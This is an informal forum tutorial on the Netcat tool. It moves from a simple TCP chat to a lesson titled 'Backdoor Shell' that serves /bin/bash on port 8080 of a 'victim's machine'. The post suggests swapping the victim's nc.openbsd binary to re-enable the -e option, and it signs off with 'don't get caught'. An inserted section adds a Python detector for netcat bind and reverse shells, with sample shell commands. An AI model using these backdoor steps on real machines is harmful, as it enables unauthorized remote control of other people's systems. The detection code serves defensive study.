Introduction: So not too long ago I made a post in a forum on a completely different subject. Well, the topic I “was” going to cover is pretty interesting, big, and probably will be greatly appreciated by all of you guys, but, due to security updates and patches, that article will not be posted until a later time when I figure out a new way to do that attack. It’s pretty cool! Trust me! Until then I have something else.
I noticed that a lot of beginner questions are being posted in the forums and thought I’d cover a couple things that are useful, cool, and well… not in the articles.
Introduction #2: So I was messing around on the internet and came across a tool called Netcat. When I read about it I thought to myself, “This would have been totally great to know about back in my freshman year of high school!” I was failing Spanish 1 while doing tech work for my Spanish teacher. Facepalm big time guys! I’ve been messing with it for a couple of days and it’s some pretty cool stuff. It’s really good for reverse TCP attacks as well. Anyways, let’s talk about this tool.
It’s called Netcat! Also known as “the TCP/IP swiss army knife” in many sources.
You can start this tool in two ways, by typing
nc
or
netcat
Anyways here’s a description of this cool little tool.
No need for me to rewrite what’s already been written.
[Printed from Netcat’s man page]
DESCRIPTION
The nc (or netcat) utility is used for just about anything under the sun involving TCP or UDP. It
can open TCP connections, send UDP packets, listen on arbitrary TCP and UDP ports, do port scanning,
and deal with both IPv4 and IPv6. Unlike telnet(1), nc scripts nicely, and separates error messages
onto standard error instead of sending them to standard output, as telnet(1) does with some.
Common uses include:
· simple TCP proxies
· shell-script based HTTP clients and servers
· network daemon testing
· a SOCKS or HTTP ProxyCommand for ssh(1)
· and much, much more
Pretty cool stuff huh?! So, let’s get started…
A list of all command arguments can be found in the man page:
man netcat
Lesson 1:
———————————————————————————————————————–
Netcat as an instant messenger
———————————————————————————————————————–
To get warmed up and break into this tool we are going to do a little TCP instant messaging.
First let’s create the chat server:
netcat -l 8080
What we’re doing is telling netcat to listen on port 8080:
-l (lower case L) = listen
followed by the port number.
After that we’re going to move to the other machine and type:
netcat -vv 63.233.251.218 8080
-v = verbose, -vv = extra verbose
This is going to create a connection to the IP address (63.233.251.218). The IP is obviously going to be the address of the machine you’re connecting to, which would be the server in this case.
FYI, this is NOT a real host… just a random IP address from
http://sqa.fyicenter.com/Online_Test_Tools/Test_IP_Address_Generator.php
You should then receive this in your terminal:
Connection to 63.233.251.218 8080 port [tcp/http-alt] succeeded!
Anything you type in either terminal will then appear in the other one, right below that line.
Voilà!
Lesson 2:
———————————————————————————————————————–
Remote Connection with Backdoor Shell aka… Hacking :)
———————————————————————————————————————–
Same thing as the first step. Start listening on the port you desire:
netcat -lvn 8080 -e /bin/bash
What this is doing is listening on port 8080 and serving shell access to whoever connects through that port.
/bin/bash is the location of the shell on Linux; on Windows it would be cmd.exe, yeah…
Note: netcat isn’t installed by default on windows :P
Now we are going to connect to the victim’s machine from our machine by doing this:
nc -vn 63.233.251.218 8080
Same thing as before, just connecting through port 8080 on 63.233.251.218.
Once the connection is successful start typing your commands in and the results will appear below like they normally would.
Now a couple things before I go!
If you’re using Ubuntu this won’t work! Yes, netcat is installed by default, but it is revised to cancel out the -e argument. Psht, security, right?! Therefore when you are on the victim’s machine setting up the listening connection you will have to swap out the file nc.openbsd with the traditional version. You could simply do this though. I haven’t tried it yet but it seems legit. Download the version including the -e option and simply name it nc.openbsd, and to speed things up create a bash script, prior to the attack (which I will speak about in another article), to do all of the work right away. Something like rm /bin/nc.openbsd | cp [locationofreplacement] blah blah blah… y’know, but that’s another story. It has to be nc.openbsd because the nc and netcat commands in the /bin directory are both links to the actual nc.openbsd file, probably to throw you off or something.
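From the other side of the fence: the Lesson 2 listener (`netcat -lvn 8080 -e /bin/bash`) and the nc.openbsd / nc.traditional swap above are exactly what an admin looks for in a process listing. This is an added example, not part of the original post: it classifies constructed `ps -eo args` style command lines and flags any netcat-family process that wires a program to the socket, distinguishing a listening bind shell from an outbound (reverse) one. The binary names and flag meanings are assumptions noted in the comments.

```python
"""Flag netcat invocations that hand a program to the network (added example)."""
import shlex

# Assumption: names the netcat family goes by on Linux boxes. nc.openbsd and
# nc.traditional are Debian/Ubuntu's two variants; ncat is the Nmap rewrite.
NETCAT_NAMES = {"nc", "netcat", "nc.openbsd", "nc.traditional", "ncat"}
# -e / --exec run a program on the socket (nc.traditional, ncat). -c / --sh-exec
# do the same through /bin/sh there, but -c means TLS in newer OpenBSD nc, so
# confirm which variant is installed before acting on a -c hit.
EXEC_LONG = {"--exec", "--sh-exec"}
EXEC_SHORT = "ec"


def classify(cmdline):
    """Return None for benign or non-netcat lines, else a short verdict."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes: not a parseable command
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] not in NETCAT_NAMES:
        return None
    args = argv[1:]
    listening, target = False, None
    for i, tok in enumerate(args):
        nxt = args[i + 1] if i + 1 < len(args) else "?"
        if tok.startswith("--"):                 # long option, maybe --exec=prog
            name, _, val = tok.partition("=")
            if name in EXEC_LONG:
                target = val or nxt
        elif tok.startswith("-"):                # short options, possibly combined (-lvn)
            letters = tok[1:]
            listening |= "l" in letters
            if any(f in letters for f in EXEC_SHORT):
                target = nxt
    if target is None:
        return None
    mode = "bind shell (listener)" if listening else "reverse shell (outbound)"
    return f"{mode} via {target}"


def scan(lines):
    """Return [(cmdline, verdict)] for every flagged line of a process listing."""
    return [(line, v) for line in lines for v in [classify(line)] if v]


SAMPLE_PS = [  # constructed, shaped like `ps -eo args` output
    "netcat -l 8080",                                       # Lesson 1 chat: benign
    "netcat -lvn 8080 -e /bin/bash",                        # Lesson 2 bind shell
    "nc -vn 63.233.251.218 8080",                           # plain client: benign
    "/bin/nc.traditional -e /bin/sh 63.233.251.218 4444",   # outbound shell
    "ncat --exec=/bin/bash -l 9001",                        # ncat bind shell
    "grep -e netcat /var/log/syslog",                       # not netcat at all
]
```

Run `scan(SAMPLE_PS)` to get the three flagged lines with their verdicts; feeding it real `ps -eo args` output is a one-line change.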
Have fun, be safe, this is all educational and junk. Whatever other disclaimers and legal info you see on other forums, YouTube videos, etc., just autofill here and all that fun stuff!
Have fun, Happy hacking, don’t get caught! I’ll probably do other netcat tutorials, since it’s such an awesome tool, once I learn more and use it more! Also other alternatives for when netcat isn’t present and other cool hacks/cracks.
Cheers!
p.s. If you have any requests feel free to message me or post a comment